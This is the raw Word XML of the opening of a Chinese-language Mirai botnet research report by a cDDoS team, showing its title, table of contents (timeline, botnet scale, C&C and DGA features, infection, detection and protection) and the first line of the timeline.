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F21" w:rsidRDefault="007B1DCB" w:rsidP="007B1DCB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc469905243"/>
      <w:r>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="003C3F7B">
        <w:t>僵尸网络</w:t>
      </w:r>
      <w:r w:rsidR="00C6017E">
        <w:t>研究</w:t>
      </w:r>
      <w:r>
        <w:t>报告</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000263D9" w:rsidRPr="000263D9" w:rsidRDefault="00BE7FAF" w:rsidP="00BE7FAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>长安通信</w:t>
      </w:r>
      <w:r>
        <w:t>cDDoS</w:t>
      </w:r>
      <w:r>
        <w:t>团队</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="-689828556"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="007E2F86" w:rsidRDefault="007E2F86">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="007E2F86">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc469905243" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mirai</w:t>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸网络研究报告</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905243 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905244" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>事件时间线</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905244 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905245" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸网络现状</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905245 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905246" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸网络规模</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905246 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905247" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸主机分布</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905247 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905248" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C&amp;C</w:t>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>主机及</w:t>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DGA</w:t>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>特征</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905248 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905249" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>感染原理</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905249 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905250" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>鉴别与防护</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905250 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905251" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>受感染主机的症状与鉴别方式</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905251 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905252" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何进行防护</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905252 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905253" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>社区研究进展</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905253 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005E419F" w:rsidRDefault="00D77335">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc469905254" w:history="1">
            <w:r w:rsidR="005E419F" w:rsidRPr="003D222F">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>书目</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc469905254 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="005E419F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007E2F86" w:rsidRDefault="007E2F86">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="007E2F86" w:rsidRPr="007E2F86" w:rsidRDefault="007E2F86" w:rsidP="007E2F86"/>
    <w:p w:rsidR="00490F21" w:rsidRDefault="00490F21" w:rsidP="009A1AB3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc469905244"/>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidR="008C1061">
        <w:t>时间线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00237AE8" w:rsidRDefault="00CB7010" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年8月</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="1183400632"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00AE2862">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Rol16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00AE2862">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="005B6355">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004353F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="009370D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irai</w:t>
      </w:r>
      <w:r w:rsidR="002E2D9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件</w:t>
      </w:r>
      <w:r w:rsidR="009370D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始活动</w:t>
      </w:r>
      <w:r w:rsidR="00247D45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，扫描并</w:t>
      </w:r>
      <w:r w:rsidR="006C1B45">
        <w:rPr>
